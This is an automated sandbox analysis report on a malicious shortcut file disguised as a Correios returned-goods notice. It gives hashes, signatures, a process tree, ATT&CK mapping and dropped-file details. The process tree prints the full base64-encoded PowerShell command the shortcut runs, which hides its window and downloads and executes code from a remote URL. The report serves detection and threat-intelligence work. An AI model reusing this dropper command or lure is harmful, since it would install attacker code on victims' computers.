5d7beb38ad6b3a36063482ae3784e4762557a348bff1768dd47acb8b200e6971

General

Target

Mercadoria_Devolvida-Correios-ZRD202JP.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2548	powershell.exe
6	2548	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2548	powershell.exe
2548	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2548	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 2548	2004	cmd.exe	29
PID 2004 wrote to memory of 2548	2004	cmd.exe	29
PID 2004 wrote to memory of 2548	2004	cmd.exe	29
PID 2548 wrote to memory of 2592	2548	powershell.exe	30
PID 2548 wrote to memory of 2592	2548	powershell.exe	30
PID 2548 wrote to memory of 2592	2548	powershell.exe	30
PID 2592 wrote to memory of 2420	2592	csc.exe	31
PID 2592 wrote to memory of 2420	2592	csc.exe	31
PID 2592 wrote to memory of 2420	2592	csc.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-ZRD202JP.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2004
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\_jedn_k8.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBA4.tmp"
      4⤵
      PID:2420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBA5.tmp

Filesize
1KB

MD5
40701b8e31935bbb8de40a7d9f59923e

SHA1
8ca3f3bea083a34332e3e76987645837f39aa891

SHA256
bbfc5cde53568d2251f681326f4ef4907f21b1881f88f33f0412eb40e421afac

SHA512
16c0c85ff10870cf2c28093a1bd820efaea057fd79f19aeeaf29cf8131ad3a6218b26fb6dea88a0330f952837ab832a379df5af663635c6717cf61334e03e6e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_jedn_k8.dll

Filesize
3KB

MD5
318f1f3457add25fbee098fba6b770ce

SHA1
8c47b82709b334f5fe8e956628c54c25f25bd2a4

SHA256
5a6b0acf9ffaccec9e572f7420fff6c5a1a20cd7cbfe95a2fd655b9c4fdd3ff5

SHA512
cb5e56381e4bb44ea77796e6896ea63a96b0e58646a5d6ed582f76331c757ad8f7c00b8455ee736940299831295fc57563f56ef18a401b16c9c535648e75d309

Download Submit
C:\Users\Admin\AppData\Local\Temp\_jedn_k8.pdb

Filesize
7KB

MD5
b047436c918507bdc7a0a865c11f5319

SHA1
aa16b8386279c62e1ad170016e5dfd0ab9085f29

SHA256
403f272470592b5a2dc0b854eaf499fb4b5403e35f10cc6634a5e91bfd6f80b8

SHA512
cb705ac68c7e32e942a2574db701d5b01b7829fdfef4dbede496b00160cdfbcb1338ad409cbe80bffe72a94fefbe78de9da79b58e670744d11383cdc0380bc4e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBA4.tmp

Filesize
652B

MD5
a6818047a900a216bbb11d5d599e2a99

SHA1
b7d98a84ce43d5b92d8d20ca53cfe31edfe5c724

SHA256
65993534ceb19a63f0ca805844547afe1f99fd6b1e38e6a64679d10d9886c68f

SHA512
bb1f9cbc2c7569f07329962735db2f49a5954c80d17b28f0f85995b7846c6a084cf3d91c42af69c50876d565f67e28311ae6ce9d856c3c391278ce8d1ba2719f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_jedn_k8.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\_jedn_k8.cmdline

Filesize
309B

MD5
37485a1ea108c214e976c081e5e16edc

SHA1
bb6e6a6ad845ef286170fb466eb8362762730061

SHA256
f7b7c1895dc3491ad05c27c1fd16b528565eab90975fbb2ffaf7ae32e8dd39a0

SHA512
ac3205adb170b8270b8d81f33e706f9d6751df8fea736e930fc7fc3562c0718c4bfe2bd02f0d79ccf706df6c2d01ebc0219c28c70c49978cd34eb56a5178d419

Download Submit
memory/2548-44-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-45-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-38-0x000007FEF5BAE000-0x000007FEF5BAF000-memory.dmp

Filesize
4KB

Download
memory/2548-41-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-43-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-42-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-40-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2548-59-0x0000000002960000-0x0000000002968000-memory.dmp

Filesize
32KB

Download
memory/2548-39-0x000000001B700000-0x000000001B9E2000-memory.dmp

Filesize
2.9MB

Download
memory/2548-62-0x000007FEF58F0000-0x000007FEF628D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing